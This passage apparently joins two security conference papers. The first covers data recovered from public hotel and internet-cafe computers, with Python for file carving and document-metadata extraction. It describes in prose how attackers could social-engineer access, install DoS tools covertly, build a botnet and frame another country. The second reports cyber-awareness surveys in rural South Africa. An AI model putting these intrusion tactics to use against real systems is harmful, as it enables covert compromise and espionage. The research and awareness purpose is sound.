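    png = b"\x89PNG\r\n\x1a\n" + b"<IHDR chunk>" + b"IEND\xaeB`\x82"
    return filler + jpeg + filler + pdf + filler + png + filler


if __name__ == "__main__":
    for offset, ftype, data in carve(build_sample_image()):
        print(f"{ftype} at offset {offset}: {len(data)} bytes")
```

Run against a real image (`carve(open("disk.img", "rb").read())`), this recovers whole files only when they are stored contiguously; fragmented files need the file-system-aware passes a real carver adds, but the sensitive documents the paper describes were recovered with exactly this kind of tool.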
The analysis of the metadata in these documents has led to the recovery of important technical information. In some cases, former modifications of documents (e.g. PDF) can even be recovered, since they are kept hidden in the file. It is clear that many users are professionals, more than originally suspected, with heavy responsibilities and decision-making power. From this point of view, top luxury hotels (4/5 stars) and cyber cafes near train stations or airports are the most productive. The analysis of application history (browsers, logs of applications or of the operating system itself...) also yields a lot of information.
Figure 2: Document of the High Court of Justice of Europe (Kononov v. Latvia).
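As an added example, not part of the paper, the following Python pulls the two kinds of evidence mentioned here and in Section 3: the docProps metadata of an Office (OOXML) document, which names the author, the last editor and the company, and the earlier saved states of a PDF, which incremental saving leaves intact in the file. The sample .docx and PDF are constructed in memory (the PDF only mimics the trailer/%%EOF structure and would not render), and the names in them are invented.

```python
"""Document metadata and hidden prior revisions.

Added example (not the paper's own tooling). Office documents carry
metadata that reveals who handled them and on which corporate machine;
PDFs saved with incremental updates keep every earlier revision in the
file. Both inputs are constructed in memory for the demo.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Constructed OOXML property parts (a real .docx has many more entries).
CORE_XML = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"'
            b' xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/">'
            b'<dc:creator>j.doe</dc:creator><cp:lastModifiedBy>lan-ws-017</cp:lastModifiedBy>'
            b'<dcterms:modified>2010-09-14T08:12:00Z</dcterms:modified></cp:coreProperties>')
APP_XML = (b'<?xml version="1.0" encoding="UTF-8"?>'
           b'<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">'
           b'<Application>Microsoft Office Word</Application><Company>ExampleCorp (constructed)</Company>'
           b'<Template>Normal.dotm</Template></Properties>')


def build_sample_docx():
    """Minimal zip holding only the two property parts we read."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", CORE_XML)
        z.writestr("docProps/app.xml", APP_XML)
    return buf.getvalue()


def office_metadata(ooxml_bytes):
    """Return the docProps properties of a .docx/.xlsx/.pptx as a flat dict."""
    props = {}
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        for part in ("docProps/core.xml", "docProps/app.xml"):
            if part not in z.namelist():
                continue
            for el in ET.fromstring(z.read(part)):
                name = el.tag.rsplit("}", 1)[-1]      # drop the XML namespace
                if el.text and el.text.strip():
                    props[name] = el.text.strip()
    return props


def build_sample_pdf():
    """Constructed two-revision PDF (structure only, not a renderable file)."""
    first_save = (b"%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n"
                  b"3 0 obj<</Author(j.doe)/Title(Draft v1 - confidential figures)>>endobj\n"
                  b"trailer<</Root 1 0 R/Info 3 0 R>>\n%%EOF\n")
    # An incremental save appends a replacement object and a new trailer;
    # the old object 3 above stays in the file, invisible to a viewer.
    second_save = (b"3 0 obj<</Author(j.doe)/Title(Final report)>>endobj\n"
                   b"trailer<</Root 1 0 R/Info 3 0 R/Prev 9>>\n%%EOF\n")
    return first_save + second_save


def pdf_revisions(pdf_bytes):
    """Split a PDF into its successive saved states, oldest first."""
    return [pdf_bytes[:m.end()] for m in re.finditer(rb"%%EOF\r?\n?", pdf_bytes)]


def pdf_info(pdf_bytes):
    """Extract simple /Info string values; a later definition overrides an earlier one."""
    info = {}
    for m in re.finditer(rb"/(Author|Creator|Producer|Title|ModDate|CreationDate)\s*\((.*?)\)", pdf_bytes):
        info[m.group(1).decode()] = m.group(2).decode("latin-1")
    return info


def titles_per_revision(pdf_bytes):
    """What each saved state of the document called itself."""
    return [pdf_info(rev).get("Title") for rev in pdf_revisions(pdf_bytes)]


if __name__ == "__main__":
    print(office_metadata(build_sample_docx()))
    print(titles_per_revision(build_sample_pdf()))
```

The point for a defender is the inverse: before a document leaves the company, strip docProps and save PDFs with a full rewrite (or "save as") rather than an incremental update, otherwise the draft with the confidential figures travels with the final version.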
5. Exploitation of open/public computer spaces insecurity
These open/public Internet places are also a tremendous threat insofar as they can easily be used to launch attacks. In general, no control is made and access to the computers is completely anonymous. In hotels or at international conferences, we were often able to connect without being a customer. There is often no login banner or, if there is one, it is easy to get around: just go to the welcome desk of the hotel, pretend to be a guest and obtain the credentials. A step of social engineering and traditional intelligence may also suffice.
In Internet cafes, CCTV is rare and, where present, a suitable garment that hides one's face (hood or cap) does not trigger any reaction. Hence launching a global, Conficker-type attack completely anonymously is worryingly easy. Conducting an attack against a country while falsely incriminating a third-party country is feasible in this context: just use the Internet cafes of the country you want to frame. We even verified that it was possible to install well-known Denial of Service (DoS) software such as LOIC (Low Orbit Ion Cannon) in an invisible and persistent way, i.e. without being detected by any antivirus in place. Detection by the administrator's supervision or by automated network security software occurred only after a more or less long time (for our test we attacked one of our own servers, set up especially for this purpose). Thus, by carefully calibrating a DoS tool like LOIC and carefully selecting a few Internet cafes, it is possible to plan and launch a distributed attack of relatively large magnitude. But the most serious concern is the possibility of targeted attacks against companies. We observed a number of very interesting things; let us summarize the most significant ones.
- Surprisingly, users are more wary of WiFi connections (even when protected by cryptography) than of open/public Internet access computers. A wired connection is seen as a (misleading) guarantee of security.
- The second point concerns users' habits. Many decision-makers use the same hotels (because of agreements between these hotels and their companies). It is therefore possible to study them on an ongoing basis over a long period of time. In cyber cafes we found that users like to use the same computer every time (when available).
- Finally, the lack of real security makes it possible to install whatever malicious software you want and to take total control of all the computers in a discreet way. It is thus easy to turn all the computers of an Internet cafe into a mini-botnet. It is also possible to install software that systematically takes a full image of any USB device connected (including the "empty" space, which is not so empty since it contains deleted data).
- It is also possible to set up a permanent network connection towards any remote server, after which the attacker no longer needs to come back to the computers.
6. Summary scenario
In order to illustrate all this, let us consider the following scenario. It is fictional in appearance only: it is inspired by what we observed during our study and laboratory tests, and is therefore particularly illustrative of what can be done.
6.1 The tactical theme
Let us suppose that the WorldLeaderInManyThings company, a non-European industrial consortium, wants to take control of its commercial competitor, the EuropeanLeaderInOneThing company. The latter is struggling to develop a high-technology product (the StarWay project) in a field that is critical for the European Community, which wants to equip Europe with its own system and thereby gain strategic independence. Indeed, Europe currently depends on WorldLeaderInManyThings' home country for that technology.
EuropeanLeaderInOneThing's engineers, CEO and CTO frequently visit European institutions in Brussels and Luxembourg. Should it fail to develop this sensitive technology, the company will face major financial problems and is likely to look for industrial partnerships. Its staff always stay at the FourGoldenStar Hotel, with which the company has a commercial agreement.
The deadline to deliver the technology is the end of November 2010. Industrial development must then begin.
6.2 The course of events
In March 2010, a major one-week meeting takes place in Brussels with the European technical supervisors of the StarWay project and EuropeanLeaderInOneThing's engineering team and executive staff. A number of critical issues are to be discussed.
At the beginning of April, the EuropeanLeaderInOneThing company suffers a series of computer problems that jeopardize the project: data loss, development server failures and unavailability... More worryingly, the business press and later the general press in Europe spread the news that the StarWay project will suffer major delays and tremendous cost overruns. As a consequence, EuropeanLeaderInOneThing's shares drop by nearly 30% over the month of April. The CTO is dismissed. The European Commission asks for a financial investigation and a technical evaluation of the situation. Two months later, an official announcement is made by the EC: the StarWay project is pushed back by at least one year and 1.5 billion euros must be added to the project budget. EuropeanLeaderInOneThing's shares plunge immediately after the announcement (a further 40% down). The company CEO is dismissed. A major crisis is about to strike the company. At the beginning of September, the WorldLeaderInManyThings company makes a takeover bid for EuropeanLeaderInOneThing. The shareholders massively accept and the takeover succeeds. The European Commission postpones the StarWay project until further notice.
6.3 Course of events analysis
In reality, all those events and the final outcome result from multi-level, multi-step computer intelligence and computer attacks by the WorldLeaderInManyThings company against the EuropeanLeaderInOneThing company. Its aim was first to get rid of a commercial competitor (commercial interest) and second to make sure that the StarWay project would be called into question (strategic interest for its home country). For that purpose, it hired a few intelligence experts and hackers. We will call them the A-Team.
In a first, intelligence step, the A-Team analyzed the habits of the EuropeanLeaderInOneThing engineers and staff who regularly traveled to and stayed in Brussels and Luxembourg for the StarWay project. The A-Team quickly noticed that they regularly used the wired Internet accesses in the hotel business lounge or in the cyber cafe near the bar and restaurant they frequented downtown. Listening to their discussions, they learned that EuropeanLeaderInOneThing's CSO strictly forbade the use of wireless networks. Taking control of the hotel and Internet cafe computers, the A-Team first installed computer surveillance. This gave them a precise insight into the security in force at EuropeanLeaderInOneThing. The A-Team managed to steal the passwords of EuropeanLeaderInOneThing email accounts and to collect a lot of sensitive information from the staff's USB keys (including deleted files).
In a second step, the attack against the EuropeanLeaderInOneThing LAN was initiated. The USB keys used by its engineers and CTO were infected with malware that the antivirus in place could not detect; infecting Word and PDF documents was sufficient. A few days later, when those USB keys were plugged into the LAN computers, a sophisticated Trojan horse was installed. The malware was able to bypass all the protection in place, including the DMZ and firewalls. Various attacks were then performed: secure erasure, theft or manipulation (insertion of wrong technical data) of StarWay project data, server failures... In parallel, having taken control of the email boxes, the A-Team organized the information leak and deception operations towards the press in such a way that they seemed to come from disappointed EuropeanLeaderInOneThing employees. The end of the story was nothing but logical.
7. Conclusion
This scenario will probably appear artificial and exaggerated. In fact, it is not. This attack was possible because (too) many critical mistakes were made by the EuropeanLeaderInOneThing company. The false sense of security given by "antivirus able to detect 100% of known and unknown malware", by wired Internet connections and so on generally works against users. But in this case, as in many others, the attack was possible due to a total lack of intelligence methods on the defender's side. Generally, users think that computer security is just a technical matter. It is not. It is only the very last link of a very long chain.
Critical employees of companies (engineers, CTO, CSO, CEO...) should be instructed in the aggressive methods that any of their competitors could or will use. They have to think the way the attacker will. Otherwise they are dead. The use of open/public Internet access represents a maximum danger: no professional use should be allowed.
More generally, standards and security/risk analysis methods should evolve to meet the forthcoming challenges with respect to system and network security. The attacker's mind and techniques, as well as intelligence operation techniques, should enlarge our vision of what the security of critical systems and infrastructures really is. It is no longer possible to defend and protect without being aware of how we can attack, destroy and pervert security.
Evaluating Cyber Security Awareness in South Africa

Marthie Grobler (1), Joey Jansen van Vuuren (1) and Jannie Zaaiman (2)
(1) Council for Scientific and Industrial Research, Pretoria, South Africa
(2) University of Venda, South Africa
mgrobler1@csir.co.za
jjvvuuren@csir.co.za
jannie.zaaiman@univen.ac.za
Abstract: In many ways, the internet and cyber world is a dangerous place where innocent users can inadvertently fall prey to shrewd cyber criminals. These dangers, combined with a large portion of the South African population that has not had regular and sustained exposure to technology and broadband internet access, expose local communities to cyber threats. Research done by the Council for Scientific and Industrial Research and the University of Venda shows that these local communities are not empowered to deal with these threats. To prevent innocent internet users from becoming victims of cyber attacks, an intensive awareness campaign is planned to educate novice internet and technology users with regard to basic security. The motivation for this awareness project is to educate all South Africans using the internet, in an attempt to strengthen the level of awareness concerning the South African network: if there are local communities that are not properly educated, their technology devices may remain unprotected. This may leave the South African internet infrastructure vulnerable to attacks, posing a severe threat to national security. In this specific project, national security will be promoted through awareness training focusing on the newly released broadband capability and knowledge transfer within rural communities. To evaluate the current level of cyber security awareness, a series of exploratory surveys has been distributed to less technologically resourced entities in rural and deep rural communities within South Africa. By analysing the results of the surveys, it is possible to benchmark the current level of awareness. These observations can then be extrapolated to the larger group of rural South African communities. The next stage of the awareness evaluation project is to develop cyber security awareness training modules for the local communities in their native tongue, aimed at improving the current level of awareness. This paper discusses the preparation, evaluation and training of South African rural communities with regard to cyber security awareness. Due to the networked nature of the internet, the level of awareness has an influencing impact on the global community. Thus, to ensure a safely protected South African network, it is necessary to target the communities that can inadvertently leave the network vulnerable.

Keywords: cyber security, awareness, rural communities, broadband, training, South Africa
1. Introduction

Cyber space is a complex environment that can advance individuals' experience of electronically dependent activities, but can also place these individuals and their respective nations in a vulnerable state. Cyber space, cyber awareness and cyber security play an important role in the online experience of individuals, and need to be addressed accordingly. The internet and cyber world is a dangerous place where innocent users can inadvertently fall prey to shrewd cyber criminals. These dangers, combined with a large portion of the South African population that has not had regular and sustained exposure to technology and broadband internet access, expose local communities to cyber threats.

Research done by the Council for Scientific and Industrial Research (CSIR) and the University of Venda shows that these local communities are not empowered to deal with these threats. To prevent innocent internet users from becoming victims of cyber attacks, an intensive awareness campaign is needed to educate novice internet and technology users with regard to basic security. The motivation for this awareness project is to educate all South Africans using the internet, in an attempt to strengthen the level of awareness with regard to the South African network: if there are local communities that are not properly educated, their technology devices may remain unprotected. This may leave the South African internet infrastructure vulnerable to attacks, posing a severe threat to national security. In this specific project, national security will be promoted through awareness training focusing on the newly released broadband capability and knowledge transfer within rural communities.
2. The impact of broadband penetration on National Security

With the impending increase in broadband access in South Africa, an average citizen's computer or identity could in future be used (with or without their knowledge and consent) as a hub for launching cyber attacks on the rest of the world. The modern definition of national security includes human security, the security of the individual as well as the average citizen (Phahlamohlaka, 2008). Africa as a continent recently had an increase in broadband access from a previous 120 Gbps to 12 Tbps over two years. Although the level of cyber attacks from the continent was very low, it could in future be used as a hub for launching cyber warfare type attacks on the rest of the world. Research done by the United States' Naval Warfare Command indicates that cyber developments have moved the battlefield to the average citizen's home: attackers could take over a new computer within 30 seconds of its first connection to the internet (Jansen van Vuuren, Phahlamohlaka & Brazzoli, 2010).

This can have a dramatic impact on National Security. For example, there are some arguments that South Africa's strong ties with China could place the country at high risk of cyber war attacks (Stiennon, 2009). The generic National Security framework proposed by Jansen van Vuuren, Phahlamohlaka and Brazzoli (2010) lists a number of cyber security threats to National Security due to the heightened broadband access. These threats can be categorised as either natural determinants or social determinants.
2.1 Natural determinants

Natural determinants are causal factors influenced by the specific environment analysed.

Geography and resources contribute largely to the impact of broadband penetration in a specific environment. For example, the shipment of outdated computers to Africa poses a security threat, since outdated software is vulnerable to attacks for which updates are no longer available. Taking into consideration the 100 million computers in Africa, increased access will result in internet users, and especially individuals in rural communities, being attacked regularly.

The population in a specific environment determines the extent to which broadband penetration can have an impact: the bigger the population, the higher the potential broadband penetration. For example, the occurrence of botnets may drastically increase as internet connectivity increases with high broadband access. This would result in armies of networked compromised computers in the homes of many South Africans, posing serious threats to a country's National Security.
2.2 Social determinants

Social determinants are causal factors influenced by the groups and individuals in the specific environment analysed.

The economy plays a motivating role in the impact of cyber threats. Recently South Africans experienced several extensive scamming attacks, of which the most prominent were the harvesting of personal information using the name of the South African Revenue Service (SARS) and the fraudulent World Cup offers supposedly from South African Airways (SAA). Many people have already succumbed to these fraudulent emails that gather their personal information. South African banks are also currently experiencing an increase in banking fraud that directly threatens individuals, who may lose their savings.

Politics has a direct influence on National Security. Accordingly, attacks on websites of the African National Congress (ANC), the ruling party in South Africa, with the aim of discrediting the party, or the use of party members' names to scam money from innocent citizens, resulted in embarrassment to the party and a tumultuous political environment. A fraudulent email discussing a national strike in the near future created uncertainty and could have created instability in the country.

The military is responsible for protecting a country's National Security. Currently, many South African citizens are not security savvy enough to thwart cyber attacks successfully, potentially leaving the South African network compromised and open to attacks on a larger national scale.

Psychology can play a large role in the social aspects of cyber threats. For example, Distributed Denial of Service (DDoS) attacks have already been combined with website defacement to place Psychological Operations (PsyOps) messages on compromised websites, as seen in the attacks on Georgia in 2008. Recently, cell phones were also used to organise protests and influence citizens to take part in a national strike that paralysed Mozambique's capital (AFP, 2010).

Information is paramount in any cyber threat. South Africa identified the need for Information and Communication Technology (ICT) access for all its citizens, which must be promoted at all levels of the community so that everybody is exposed to the use and benefits of ICT. Along with increased broadband access and connectivity for all its citizens comes the possibility of viruses that could damage users' computers and information. Malicious code can also be used to overwrite the infected computer's hard drive, which could result in massive loss of data and information, as experienced in Korea with the DDoS attacks (Kebbs, 2009).
The results of this analysis indicate the necessity of security awareness in South Africa to combat these cyber threats. Since both natural and social determinants are commonplace, and both potentially have a major effect on a country's information infrastructure, it is necessary to consider broadband penetration when planning a cyber security awareness project.
2.3 Governments' responsibility

In the light of existing international law doctrine, a country may be considered responsible for acts performed by residents if the country explicitly authorised these acts on its behalf. The country may also be held responsible for a breach of an international obligation, or for not preventing an attack from taking place (Kulesza, 2010). Developments in global technology make it difficult for a country to control its residents' actions in operating hardware located within the country's territory, and nearly impossible to control non-residents outside the country's jurisdiction who control hardware inside it. Regardless of the associated difficulties, cyber crime is a reality that unfortunately often targets uneducated individuals who do not know how to identify cyber scams or how to keep their computers protected.

Therefore, South Africa can be considered responsible for preventing attacks from inside its borders on other countries. It is accordingly the responsibility of the South African Government to support extensive awareness programmes to prevent attacks from inside South Africa's borders on other countries. In its quest to manage Cyber Security, a formal notice was issued in February 2010 regarding its intention of publishing a South African National Cyber Security Policy (Gazette No 32963, Feb 19, 2010). The country did this within the context of its global citizenry and the commitment it has made to the World Summit on the Information Society (WSIS) in 2001, and to the International Telecommunication Union (ITU), to assist in the further development of the Global Cyber Security Agenda (GCA). One of the elements of this policy is the importance of cyber security awareness programmes for South Africa.
3. Situational analysis: the case of the Vhembe district

The CSIR and the University of Venda's schools of Mathematical and Natural Sciences, and Management Sciences, are collaborating to raise cyber security awareness in local rural communities in the Vhembe district of the South African Limpopo province. In Phase 1, a group of CSIR researchers trained a number of student volunteers at the University of Venda to teach specific groups of computer users, including secondary school users, further education and training users, university (non-technical) users and community centre users. More rural communities are becoming integrated into the global village due to increased hardware and software corporate donations, the proliferation of mobile Internet devices and government programmes aimed at bridging the digital divide. The next section provides some information on the area.
3.1 Limpopo Province

The Limpopo Province comprises five districts: Vhembe, Capricorn, Greater Sekhukhune, Waterberg and Mopani. In 2001, 33% of the population aged 20 years or older in Limpopo had no education at all, while 7% had post-high-school education (see Table 1). These figures, in general, show an increase in all categories since 1996, with the exception of the no schooling category. This decrease indicates a higher percentage of people attending school.
Table 1: Level of education among adults 20 years or older, in Limpopo, 2001

Level of education              Number      %
No schooling                    789 731     33
Some primary education          336 377     14
Completed primary education     133 206      6
Some secondary education        629 057     26
Grade 12/Standard 10            337 627     14
Higher education                162 454      7
Total                         2 388 452    100
In Limpopo there are approximately 4290 primary schools and 1300 secondary schools with over 1.8 million learners and almost 58000 teachers (2002). In 2002 less than 10% of the schools in the province were computerised, and fewer than half of those were really utilising their computers. Since then the situation has improved, mainly due to a considerable amount of donations, but many schools still lack computers, connections and the capabilities related to them.
In higher education institutions in Limpopo, there are about 40000 students enrolled per year. The number of university graduates is about 15000 per year, with only 4% graduating in ICT related fields. The Limpopo province had an enrolment figure of 10500 for 2010.
3.2 Vhembe District

The Vhembe District covers 21407 square km of land. It was originally settled by tribes of Khoisan people. It was later settled by the Venda people (recently migrated from what is now Matabeleland South in Zimbabwe), who constitute a majority of the Vhembe population today. According to the DWAF Stats Form-D study, the Vhembe population has increased and now stands at 1 388 427 people. The number of households is estimated at 269547, with 50% of the population being under the age of 20 years. The District is still faced with an infrastructural backlog, with 53% of the population not having access to running water, 68% of the population not having access to sanitation, and 46% of the population not having access to basic levels of electricity (Vhembe District Municipality, 2007). As a result, much of the population would use centralised community centres or internet cafes to access the internet.

About 57% of the population does not have formal education, 9% has primary education, 20% has secondary education and only 3% has tertiary education. The main contributions to the economy are community services (22%), trade (14%) and mining (0.7%). Tourism, agriculture and manufacturing are also significant, with potential to be further enhanced. The unemployment level is at 53% (Vhembe District Municipality, 2007). Tables 2 to 5, and Figure 1, show a range of demographic statistics on the population of the Vhembe District.
Table 2: Local municipalities (Vhembe District Municipality, 2007)

Local municipality    Population    %
Thulamela                584 568    48.72%
Makhado                  497 093    41.43%
Mutale                    78 917     6.58%
Musina                    39 308     3.28%

Table 3: Language and population demographics (Vhembe District Municipality, 2007)

Language          Population    %
Venda                818 900    68.25%
Tsonga               316 703    26.40%
Northern Sotho        27 922     2.33%
Afrikaans             13 697     1.14%
Sotho                  7 714     0.64%
Other                  5 942     0.50%
English                4 545     0.38%
Ndebele                1 763     0.15%
Zulu                     870     0.07%
Tswana                   840     0.07%
Xhosa                    659     0.05%
Swati                    331     0.03%

Table 4: Gender composition (Vhembe District Municipality, 2007)

Gender    Population    %
Female       662 815    55.24%
Male         537 041    44.76%

Table 5: Ethnic groups (Vhembe District Municipality, 2007)

Ethnic group    Population    %
Black African    1 181 672    98.48%
White               13 625     1.14%
Indian/Asian         2 911     0.24%
Coloured             1 648     0.14%

[Figure 1: Age analysis (Vhembe District Municipality, 2007)]
These new netizens in rural communities are not cyber security savvy. This is why cyber security self-defence workshops for volunteer facilitators in the Vhembe district were introduced. Discussions for the initiative started at the end of 2009, but the formal planning, collaboration and development of the cyber security awareness training programme officially commenced in May 2010.
4. Current level of awareness in the Vhembe district

The proposed cyber security awareness training module is part of a larger project that aims to establish an Institute for Broadband and Rural ICT Development at the University of Venda to assist rural communities in adapting to the opportunities presented by broadband and other forms of ICT. As part of the project, the CSIR developed surveys to assess the current level of cyber security awareness within the communities. Large numbers of these surveys were distributed to some of the community centres and schools participating in the project.

During the second half of 2010, a number of surveys were distributed to both educators and secondary school learners in the Vhembe District. These surveys were presented to participants before any cyber security awareness training material was presented to them, and were intended to test current awareness of cyber related topics. The surveys were presented in English, which is not the mother tongue of most of the participants. The results presented next accordingly need to be read with potential language barriers in mind.
4.1 Educators' survey

One of the initial pilot studies was done with educators attending a community centre focused on the development of Mathematics and Science among learners in rural communities. Participants in the survey indicated that they do not have a problem with English as a spoken language, but that they are not comfortable with English as a written language. This was confirmed by contradictory answers given in the surveys. Participants were mostly over the age of 30 and thus did not grow up in the technological era for these rural communities. More than 90% of the participants have cell phones, but they indicated that these are used mostly for text messaging and verbal communication.

Although 67% of the participants have access to a computer (either at home or at work), the participants indicated that they do not make use of computer-based instant messaging. Participants with access to computers do make use of the internet for informational purposes. Participants indicated that their use of the internet for e-commerce was limited and that they prefer not to make use, for example, of the South African online system for income tax completion (e-filing). Most of the participants correctly indicated the meaning of social networking, whilst only 44% knew what the terms phishing and viruses meant. Participants did not know what a strong password is, but did indicate that they will not reveal their passwords to one another. Participants indicated that they would advise their children to meet online friends in places other than chat rooms. This can potentially place the children in danger of meeting sexual predators in a real world scenario. A further concern is that 44% of the participants were prepared to submit their personal details to a popular website, with no regard for the security implications and the potential for identity theft. Although the sample group did not constitute a large percentage of the educator group in the Vhembe District, the results clearly indicate that the current cyber security awareness level is relatively low, and that there is a dire need for urgent awareness training. This pilot study therefore serves as additional motivation to continue the research and roll out the awareness training on a larger scale within the Vhembe District.
4.2 Secondary schools' survey

Surveys were distributed at two secondary schools in the Vhembe District. At School A, 69% of participants indicated that they were comfortable with English as a written language, whilst 15% indicated that they were only comfortable with English as a spoken language. At School B, 26% of participants indicated that they were comfortable with English as a written language, whilst 84% indicated that they were only comfortable with English as a spoken language. At both schools, the majority of participants indicated that cell phones are the only technology devices they have access to. At both schools, only 7% of participants had prior access to a desktop computer. Participants with access to computers or cell phones connected to the internet use it for entertainment and gaming.

At both schools, most of the participants correctly indicated the meaning of phishing and social networking. Although not all participants have regular access to social networking sites or online chat, they are aware of some of the inherent dangers of communicating over the internet. Most participants indicated that they would not arrange an actual meeting with someone they have met online. 99% of all participants indicated that they will not submit personal information on a website, even if that website is very popular. At School A, 69% of participants indicated that it is wrong to break into someone else's email account and send emails pretending to be the other person, while 23% of participants indicated that they would like to learn how to break into someone else's email account. At School B, only 24% of participants indicated that it is wrong to break into someone else's email account and send emails pretending to be the other person, whilst 100% of participants indicated that they would like to learn how to do this. Most participants correctly identified weak passwords. Typical of the general classification of Millennials or Generation Y (individuals born between 1982 and 2000), the participants show increased tendencies towards ambition, new challenges and inquisitiveness (Kane, 2010). The participants created a long list of topics that they would like to see addressed in future cyber security awareness training programmes.
4.3 Development of training material

The proposed cyber security awareness programme focuses on educating beginner internet and technology users in basic computer security, and in safe and secure online habits. The objective of this programme is to prepare civilians for the use of broadband applications and new applications in cyberspace. It aims to increase awareness and understanding of the dangers of the internet, whilst providing individuals with the necessary knowledge to make the right decisions in internet-related situations. This programme is not a computer literacy course, but is better described as a self-defence course for internet users. The target audience is computer users with working computer literacy and awareness and prior exposure to the internet. These individuals should not have any formal computer related training, with the exception of computer literacy courses. For the time being, four user groups are identified:

Secondary school pupils,
Further education and training (FET) college students,
University students not studying towards a technical or information technology degree, and
Community members using the computer facilities of community centres.

The programme is rolled out in Thohoyandou, Vhembe District, in the Limpopo province of South Africa. Within the province, entities had to be selected to partake in this programme. Two classifications are used for entity selection, as shown in Table 6.
Marthie Grobler et al.
Table 6: Classification regarding entity selection
Criterion | Less resourced entity | More resourced entity
Internet connection | 1 modem | > 1 modem or ADSL
Number of computers | < 5 | 5 or more
Number of users per computer | 100:1 | < 99:1
Level of maintenance (functionality) | Less than 50% working | More than 50% working
For the initial training program, only schools and centres with previous exposure to computer facilities and internet access are selected as participants.
The cyber security awareness program modules are divided into four main topics:
Physical security – This training session addresses the importance of securing the physical computer in order to protect the computer user from potential cyber security dangers. It covers the physical protection of computers, laptops and mobile phones, as well as the importance of password protection.
Malware and malware countermeasures – This training session touches on some of the different types of malware that can be encountered in cyberspace, and provides guidelines on how to protect a computer or mobile phone from these malware types.
Safe surfing – This session addresses the guidelines that internet users should follow to ensure that the time they spend online is productive and secure. It covers internet surfing, email security, file sharing, copyright, downloads and storage in more detail.
Social aspects of cyber security – This session addresses the safest way to use social networking, as well as the dangers associated with social media on the internet and in cyberspace. It also introduces social engineering, identity theft, cookies and cyberbullies.
5. Feedback from student trainers
In September 2010, researchers from the CSIR trained a number of volunteers from the University of Venda to train the community. The majority of these students are second and third year computer science students from the University of Venda. These students assisted with the distribution and collection of initial surveys to the participating entities to determine the current level of cyber security awareness. After completing the training, the student trainers completed questionnaires about their experience. Figures 2 to 5 show the student trainers' feedback on the content of the training modules. Since the number of trainers needed for the pilot project was relatively small, the responses to the questionnaire are not indicative of the awareness level of the intended target audiences, but rather an indication of the usability of the training modules.
From Figures 2 to 5, it is clear that the student trainers found the training modules very useful and informative. Where necessary (e.g. the community centre module, the topic of cookies), the material was adjusted according to the feedback received from the student trainers.
Figure 2: Feedback on the content of the secondary school training module. [Bar chart: number of responses (0 to 4) per topic. Topics: Physical computer security, Physical mobile security, Password protection, Virus protection, Pop-ups, adware and spyware, Botnets, Surfing the web, Email security, File sharing and copyright, Social networking, Social engineering, Identity theft, Cookies, Cyberbullies. Response categories: Not interesting; Did not learn anything new; Learned some new things; Learned a lot of new things; Too technical.]
Figure 3: Feedback on the content of the FET training module. [Bar chart: number of responses (0 to 5) per topic. Topics: Physical computer security, Physical mobile security, Password protection, Virus protection, Pop-ups, adware and spyware, Internet banking, Botnets, Surfing the web, Email security, File sharing and copyright, Social networking, Social engineering, Identity theft, Cookies, Cyberbullies. Response categories: Not interesting; Did not learn anything new; Learned some new things; Learned a lot of new things; Too technical.]
Figure 4: Feedback on the content of the university (non-IT) training module. [Bar chart: number of responses (0 to 4) per topic. Topics: Physical computer security, Physical mobile security, Password protection, Virus protection, Pop-ups, adware and spyware, Internet banking, Botnets, Surfing the web, Email security, File sharing and copyright, Social networking, Social engineering, Identity theft, Cookies, Cyberbullies. Response categories: Not interesting; Did not learn anything new; Learned some new things; Learned a lot of new things; Too technical.]
Figure 5: Feedback on the content of the community centre training module. [Bar chart: number of responses (0 to 6) per topic. Topics: Physical computer security, Physical mobile security, Password protection, Virus protection, Pop-ups, adware and spyware, Internet banking, Botnets, Surfing the web, Email security, File sharing and copyright, Social networking, Social engineering, Identity theft, Cookies, Cyberbullies. Response categories: Not interesting; Did not learn anything new; Learned some new things; Learned a lot of new things; Too technical.]
6. The way forward
The next step in the cyber security awareness program is to roll the training material out to the community. Each of the students that were trained is allocated to a specific entity, and these students have to train the community in their specific entity. The community training program is free of charge, but the volunteers need to adhere to specific conditions in order to participate in the program:
The volunteer needs to complete a questionnaire before starting the training. This questionnaire will not be anonymous and will allow the CSIR to score the individual's current level of cyber security awareness.
The volunteer needs to be willing to attend classes organised and hosted by the student volunteer trainers from the University of Venda. The trainers will communicate the dates and times of these training sessions to the volunteers. To be part of the training, the volunteer needs to attend all the classes and workshops.
The volunteer needs to complete a questionnaire after completing the training. This questionnaire will not be anonymous and will allow the CSIR to score the individual's awareness after completing the program.
The questionnaires consist of three sections. Basic demographic information is asked in order to customise the cyber security awareness training program to fit a specific user group and to identify an individual's level of awareness. History and background questions on technology are asked in order to determine the current level of technology usage within the specific user's environment. Specific scenarios are presented to determine the current level of cyber security awareness and understanding within the specific user's environment.
7. Conclusion
The results from the pilot surveys hint toward a low level of awareness regarding the implications and dangers of cyber warfare and the consequences of participation in social networks. Although the current research is based on an exploratory study with a small group of participants, it uncovered a need for intensive further training in a number of identified modules across all the identified groups, including secondary schools, further education training colleges and community centres, as well as all university staff and students. The main benefit of a large scale roll out of this cyber security awareness training programme is that empowered trainees should be able to identify the dangers of providing information and/or enrolling on social networks where they and their personal information can be exposed and the information could be abused. Further awareness training targeted at the different stakeholder groupings should ensure that capacity is built and that the Vhembe District will become one of the first districts in South Africa with a full understanding and appreciation of cyber security and social networking dangers. Further research and additional work toward this project should drastically improve the level of cyber security awareness in South Africa.
References
AFP. (2010). Mozambique unrest shows power of the SMS. Available from: http://www.mg.co.za/article/2010-09-07mozambique-unrest-shows-power-of-the-sms (Accessed 15 October 2010).
Jansen van Vuuren, J.C., Phahlamohlaka, J. & Brazzoli, M. (2010). The impact of the increase in broadband access on national security and the average citizen. Journal of Information Warfare, Vol. 9(3), December 2010.
Kane, S. (2010). Generation Y. Available from: http://legalcareers.about.com/od/practicetips/a/GenerationY.htm (Accessed 7 January 2011).
